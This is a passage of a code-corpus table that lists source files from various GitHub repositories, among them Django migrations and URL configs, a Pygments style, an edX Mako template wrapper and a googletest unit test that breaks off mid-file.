repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
jocave/snapcraft
|
refs/heads/master
|
snaps_tests/demos_tests/test_java_hello_world.py
|
9
|
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015, 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import snaps_tests
class JavaHelloWorldTestCase(snaps_tests.SnapsTestCase):
snap_content_dir = 'java-hello-world'
def test_java_hello_world(self):
snap_path = self.build_snap(self.snap_content_dir)
self.install_snap(snap_path, 'java-hello-world', '0')
self.assert_command_in_snappy_testbed(
'/snap/bin/java-hello-world.hello', 'Hello World\n')
|
Havate/havate-openstack
|
refs/heads/master
|
proto-build/gui/config/urls.py
|
1
|
from django.conf.urls import patterns, include, url
from config.views import HomePageView, SettingsView, NodeDiscoveryView, ScenarioDiscoveryView, SubmitSettingsView, SettingsTextView
urlpatterns = patterns('',
# url(r'^$', 'app_name.views.home', name='home'),
# url(r'^openstack_installer/', include('openstack_installer.foo.urls')),
url(r'^$', SettingsView.as_view(), name='home'),
url(r'^settings/$', SettingsView.as_view(), name='settings'),
url(r'^submit_settings/$', SubmitSettingsView.as_view(), name='submit_settings'),
url(r'^settings_text_view/$', SettingsTextView.as_view(), name='settings_text_view'),
url(r'^node_discovery/$', NodeDiscoveryView.as_view(), name='node_discovery'),
url(r'^scenario_discovery/$', ScenarioDiscoveryView.as_view(), name='scenario_discovery'),
)
|
lizardsystem/lizard-workspace
|
refs/heads/master
|
lizard_workspace/migrations/0016_auto__add_field_wmsserver_is_local_server.py
|
1
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'WmsServer.is_local_server'
db.add_column('lizard_workspace_wmsserver', 'is_local_server', self.gf('django.db.models.fields.BooleanField')(default=False), keep_default=False)
def backwards(self, orm):
# Deleting field 'WmsServer.is_local_server'
db.delete_column('lizard_workspace_wmsserver', 'is_local_server')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'lizard_map.backgroundmap': {
'Meta': {'ordering': "('index',)", 'object_name': 'BackgroundMap'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'google_type': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'default': '100'}),
'is_base_layer': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'layer_names': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'layer_type': ('django.db.models.fields.IntegerField', [], {}),
'layer_url': ('django.db.models.fields.CharField', [], {'default': "'http://tile.openstreetmap.nl/tiles/${z}/${x}/${y}.png'", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'lizard_map.workspacestorage': {
'Meta': {'object_name': 'WorkspaceStorage'},
'absolute': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'background_map': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_map.BackgroundMap']", 'null': 'True', 'blank': 'True'}),
'custom_time': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'dt': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'dt_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'dt_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'td': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'td_end': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'td_start': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'x_max': ('django.db.models.fields.FloatField', [], {'default': '1254790'}),
'x_min': ('django.db.models.fields.FloatField', [], {'default': '-14675'}),
'y_max': ('django.db.models.fields.FloatField', [], {'default': '6964942'}),
'y_min': ('django.db.models.fields.FloatField', [], {'default': '6668977'})
},
'lizard_security.dataset': {
'Meta': {'ordering': "['name']", 'object_name': 'DataSet'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'})
},
'lizard_workspace.app': {
'Meta': {'object_name': 'App'},
'action_params': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'blank': 'True'}),
'action_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'appscreen': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['lizard_workspace.AppScreen']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'icon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.AppIcons']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mouse_over': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '256', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'root_map': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.LayerFolder']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'lizard_workspace.appicons': {
'Meta': {'object_name': 'AppIcons'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'lizard_workspace.appscreen': {
'Meta': {'object_name': 'AppScreen'},
'apps': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'screen'", 'symmetrical': 'False', 'through': "orm['lizard_workspace.AppScreenAppItems']", 'to': "orm['lizard_workspace.App']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'lizard_workspace.appscreenappitems': {
'Meta': {'object_name': 'AppScreenAppItems'},
'app': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.App']"}),
'appscreen': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.AppScreen']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'default': '100'})
},
'lizard_workspace.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'lizard_workspace.layer': {
'Meta': {'object_name': 'Layer'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.Category']", 'null': 'True', 'blank': 'True'}),
'data_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataSet']", 'null': 'True', 'blank': 'True'}),
'filter': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_base_layer': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_clickable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_local_server': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'layers': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'location_filter': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'ollayer_class': ('django.db.models.fields.CharField', [], {'default': "'OpenLayers.Layer.WMS'", 'max_length': '80'}),
'options': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'owner_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'request_params': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'server': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.WmsServer']", 'null': 'True', 'blank': 'True'}),
'single_tile': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200', 'db_index': 'True'}),
'source_ident': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['lizard_workspace.Tag']", 'null': 'True', 'blank': 'True'}),
'use_location_filter': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'lizard_workspace.layerfolder': {
'Meta': {'object_name': 'LayerFolder'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'layer_tag': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['lizard_workspace.Tag']", 'null': 'True', 'blank': 'True'}),
'layers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['lizard_workspace.Layer']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children_set'", 'null': 'True', 'to': "orm['lizard_workspace.LayerFolder']"})
},
'lizard_workspace.layerworkspace': {
'Meta': {'ordering': "['name']", 'object_name': 'LayerWorkspace', '_ormbases': ['lizard_map.WorkspaceStorage']},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.Category']", 'null': 'True', 'blank': 'True'}),
'data_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataSet']", 'null': 'True', 'blank': 'True'}),
'layers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['lizard_workspace.Layer']", 'null': 'True', 'through': "orm['lizard_workspace.LayerWorkspaceItem']", 'blank': 'True'}),
'owner_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'personal_category': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'workspacestorage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['lizard_map.WorkspaceStorage']", 'unique': 'True', 'primary_key': 'True'})
},
'lizard_workspace.layerworkspaceitem': {
'Meta': {'object_name': 'LayerWorkspaceItem'},
'clickable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'filter_string': ('django.db.models.fields.CharField', [], {'max_length': '124', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'default': '100'}),
'layer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.Layer']"}),
'layer_workspace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.LayerWorkspace']"}),
'opacity': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'lizard_workspace.synctask': {
'Meta': {'object_name': 'SyncTask'},
'data_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataSet']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_result': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'server': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.WmsServer']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.Tag']", 'null': 'True', 'blank': 'True'})
},
'lizard_workspace.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'lizard_workspace.thematicmap': {
'Meta': {'object_name': 'ThematicMap'},
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'lizard_workspace.wmsserver': {
'Meta': {'object_name': 'WmsServer'},
'abstract': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_local_server': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '256', 'blank': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['lizard_workspace']
|
danalec/dotfiles
|
refs/heads/master
|
sublime/.config/sublime-text-3/Packages/pygments/all/pygments/styles/native.py
|
50
|
# -*- coding: utf-8 -*-
"""
pygments.styles.native
~~~~~~~~~~~~~~~~~~~~~~
pygments version of my "native" vim theme.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Token, Whitespace
class NativeStyle(Style):
"""
Pygments version of the "native" vim theme.
"""
background_color = '#202020'
highlight_color = '#404040'
styles = {
Token: '#d0d0d0',
Whitespace: '#666666',
Comment: 'italic #999999',
Comment.Preproc: 'noitalic bold #cd2828',
Comment.Special: 'noitalic bold #e50808 bg:#520000',
Keyword: 'bold #6ab825',
Keyword.Pseudo: 'nobold',
Operator.Word: 'bold #6ab825',
String: '#ed9d13',
String.Other: '#ffa500',
Number: '#3677a9',
Name.Builtin: '#24909d',
Name.Variable: '#40ffff',
Name.Constant: '#40ffff',
Name.Class: 'underline #447fcf',
Name.Function: '#447fcf',
Name.Namespace: 'underline #447fcf',
Name.Exception: '#bbbbbb',
Name.Tag: 'bold #6ab825',
Name.Attribute: '#bbbbbb',
Name.Decorator: '#ffa500',
Generic.Heading: 'bold #ffffff',
Generic.Subheading: 'underline #ffffff',
Generic.Deleted: '#d22323',
Generic.Inserted: '#589819',
Generic.Error: '#d22323',
Generic.Emph: 'italic',
Generic.Strong: 'bold',
Generic.Prompt: '#aaaaaa',
Generic.Output: '#cccccc',
Generic.Traceback: '#d22323',
Error: 'bg:#e3d2d2 #a61717'
}
|
SANDEISON/The-Huxley
|
refs/heads/master
|
Python/Invertido.py
|
3
|
num2 = int(input ())
invert = 0
while num2 > 0:
invert *= 10
invert += num2 % 10
num2 //= 10
print (invert)
|
warriorYosemite/colorBrick
|
refs/heads/master
|
cocos2d/plugin/tools/toolsForGame/modifyProject.py
|
255
|
import sys, string, os
from xml.etree import ElementTree as ET
from xml.dom import minidom
projFile = sys.argv[1]
targetPath = sys.argv[2]
def getLinkElement():
global targetPath
ret = ET.Element('link')
nameEle = ET.Element('name')
nameEle.text = 'plugin-x'
typeEle = ET.Element('type')
typeEle.text = '2'
locEle = ET.Element('locationURI')
locEle.text = targetPath
ret.append(nameEle)
ret.append(typeEle)
ret.append(locEle)
return ret
tree = ET.parse(projFile)
root = tree.getroot()
nodeLinkRes = root.find('linkedResources')
if nodeLinkRes != None:
linkNodes = nodeLinkRes.findall('link')
haveTarget = False
if linkNodes != None and len(linkNodes) > 0:
for node in linkNodes:
locNode = node.find('locationURI')
if locNode == None:
continue
tempText = locNode.text
tempText = tempText.strip(' \n\r\t')
if tempText == targetPath:
haveTarget = True
break
if not haveTarget:
nodeLinkRes.append(getLinkElement())
tree.write(projFile, 'UTF-8')
else:
linkResEle = ET.Element('linkedResources')
linkResEle.append(getLinkElement())
root.append(linkResEle)
tree.write(projFile, 'UTF-8')
|
lsqtongxin/django
|
refs/heads/master
|
django/contrib/gis/utils/srs.py
|
450
|
from django.contrib.gis.gdal import SpatialReference
from django.db import DEFAULT_DB_ALIAS, connections
def add_srs_entry(srs, auth_name='EPSG', auth_srid=None, ref_sys_name=None,
database=None):
"""
This function takes a GDAL SpatialReference system and adds its information
to the `spatial_ref_sys` table of the spatial backend. Doing this enables
database-level spatial transformations for the backend. Thus, this utility
is useful for adding spatial reference systems not included by default with
the backend:
>>> from django.contrib.gis.utils import add_srs_entry
>>> add_srs_entry(3857)
Keyword Arguments:
auth_name:
This keyword may be customized with the value of the `auth_name` field.
Defaults to 'EPSG'.
auth_srid:
This keyword may be customized with the value of the `auth_srid` field.
Defaults to the SRID determined by GDAL.
ref_sys_name:
For SpatiaLite users only, sets the value of the `ref_sys_name` field.
Defaults to the name determined by GDAL.
database:
The name of the database connection to use; the default is the value
of `django.db.DEFAULT_DB_ALIAS` (at the time of this writing, its value
is 'default').
"""
if not database:
database = DEFAULT_DB_ALIAS
connection = connections[database]
if not hasattr(connection.ops, 'spatial_version'):
raise Exception('The `add_srs_entry` utility only works '
'with spatial backends.')
if not connection.features.supports_add_srs_entry:
raise Exception('This utility does not support your database backend.')
SpatialRefSys = connection.ops.spatial_ref_sys()
# If argument is not a `SpatialReference` instance, use it as parameter
# to construct a `SpatialReference` instance.
if not isinstance(srs, SpatialReference):
srs = SpatialReference(srs)
if srs.srid is None:
raise Exception('Spatial reference requires an SRID to be '
'compatible with the spatial backend.')
# Initializing the keyword arguments dictionary for both PostGIS
# and SpatiaLite.
kwargs = {'srid': srs.srid,
'auth_name': auth_name,
'auth_srid': auth_srid or srs.srid,
'proj4text': srs.proj4,
}
# Backend-specific fields for the SpatialRefSys model.
srs_field_names = {f.name for f in SpatialRefSys._meta.get_fields()}
if 'srtext' in srs_field_names:
kwargs['srtext'] = srs.wkt
if 'ref_sys_name' in srs_field_names:
# Spatialite specific
kwargs['ref_sys_name'] = ref_sys_name or srs.name
# Creating the spatial_ref_sys model.
try:
# Try getting via SRID only, because using all kwargs may
# differ from exact wkt/proj in database.
SpatialRefSys.objects.using(database).get(srid=srs.srid)
except SpatialRefSys.DoesNotExist:
SpatialRefSys.objects.using(database).create(**kwargs)
# Alias is for backwards-compatibility purposes.
add_postgis_srs = add_srs_entry
|
healthchecks/healthchecks
|
refs/heads/master
|
hc/accounts/migrations/0032_auto_20200819_0757.py
|
2
|
# Generated by Django 3.1 on 2020-08-19 07:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0031_auto_20200803_1413'),
]
operations = [
migrations.AddConstraint(
model_name='member',
constraint=models.UniqueConstraint(fields=('user', 'project'), name='accounts_member_no_duplicates'),
),
]
|
gasman/shortcrust
|
refs/heads/master
|
setup.py
|
2
|
from distutils.core import setup
setup(
name='Shortcrust',
version='0.1dev',
packages=['shortcrust',],
license='MIT',
long_description=open('README.txt').read(),
)
|
clarkperkins/readthedocs.org
|
refs/heads/master
|
readthedocs/projects/migrations/0002_add_importedfile_model.py
|
36
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('builds', '0001_initial'),
('projects', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ImportedFile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255, verbose_name='Name')),
('slug', models.SlugField(verbose_name='Slug')),
('path', models.CharField(max_length=255, verbose_name='Path')),
('md5', models.CharField(max_length=255, verbose_name='MD5 checksum')),
('commit', models.CharField(max_length=255, verbose_name='Commit')),
('project', models.ForeignKey(related_name='imported_files', verbose_name='Project', to='projects.Project')),
('version', models.ForeignKey(related_name='imported_files', verbose_name='Version', to='builds.Version', null=True)),
],
),
]
|
XiaodunServerGroup/ddyedx
|
refs/heads/master
|
common/djangoapps/edxmako/template.py
|
30
|
# Copyright (c) 2008 Mikeal Rogers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf import settings
from mako.template import Template as MakoTemplate
from edxmako.shortcuts import marketing_link
import edxmako
import edxmako.middleware
DJANGO_VARIABLES = ['output_encoding', 'encoding_errors']
# TODO: We should make this a Django Template subclass that simply has the MakoTemplate inside of it? (Intead of inheriting from MakoTemplate)
class Template(MakoTemplate):
"""
This bridges the gap between a Mako template and a djano template. It can
be rendered like it is a django template because the arguments are transformed
in a way that MakoTemplate can understand.
"""
def __init__(self, *args, **kwargs):
"""Overrides base __init__ to provide django variable overrides"""
if not kwargs.get('no_django', False):
overrides = {k: getattr(edxmako, k, None) for k in DJANGO_VARIABLES}
overrides['lookup'] = edxmako.LOOKUP['main']
kwargs.update(overrides)
super(Template, self).__init__(*args, **kwargs)
def render(self, context_instance):
"""
This takes a render call with a context (from Django) and translates
it to a render call on the mako template.
"""
# collapse context_instance to a single dictionary for mako
context_dictionary = {}
# In various testing contexts, there might not be a current request context.
if edxmako.middleware.requestcontext is not None:
for d in edxmako.middleware.requestcontext:
context_dictionary.update(d)
for d in context_instance:
context_dictionary.update(d)
context_dictionary['settings'] = settings
context_dictionary['EDX_ROOT_URL'] = settings.EDX_ROOT_URL
context_dictionary['django_context'] = context_instance
context_dictionary['marketing_link'] = marketing_link
return super(Template, self).render_unicode(**context_dictionary)
|
jamespcole/home-assistant
|
refs/heads/master
|
homeassistant/components/nx584/__init__.py
|
36
|
"""Support for NX584 alarm control panels."""
|
joydeeps/googletest
|
refs/heads/master
|
test/gtest_list_tests_unittest.py
|
1898
|
#!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test's --gtest_list_tests flag.
A user can ask Google Test to list all tests by specifying the
--gtest_list_tests flag. This script tests such functionality
by invoking gtest_list_tests_unittest_ (a program written with
Google Test) the command line flags.
"""
__author__ = 'phanna@google.com (Patrick Hanna)'
import gtest_test_utils
import re
# Constants.
# The command line flag for enabling/disabling listing all tests.
LIST_TESTS_FLAG = 'gtest_list_tests'
# Path to the gtest_list_tests_unittest_ program.
EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_')
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests
EXPECTED_OUTPUT_NO_FILTER_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
Abc\.
Xyz
Def
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
TypedTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
TypedTest/1\. # TypeParam = int\s*\*
TestA
TestB
TypedTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
My/TypeParamTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
My/TypeParamTest/1\. # TypeParam = int\s*\*
TestA
TestB
My/TypeParamTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
MyInstantiation/ValueParamTest\.
TestA/0 # GetParam\(\) = one line
TestA/1 # GetParam\(\) = two\\nlines
TestA/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
TestB/0 # GetParam\(\) = one line
TestB/1 # GetParam\(\) = two\\nlines
TestB/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
""")
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests and --gtest_filter=Foo*.
EXPECTED_OUTPUT_FILTER_FOO_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
""")
# Utilities.
def Run(args):
"""Runs gtest_list_tests_unittest_ and returns the list of tests printed."""
return gtest_test_utils.Subprocess([EXE_PATH] + args,
capture_stderr=False).output
# The unit test.
class GTestListTestsUnitTest(gtest_test_utils.TestCase):
"""Tests using the --gtest_list_tests flag to list all tests."""
def RunAndVerify(self, flag_value, expected_output_re, other_flag):
"""Runs gtest_list_tests_unittest_ and verifies that it prints
the correct tests.
Args:
flag_value: value of the --gtest_list_tests flag;
None if the flag should not be present.
expected_output_re: regular expression that matches the expected
output after running command;
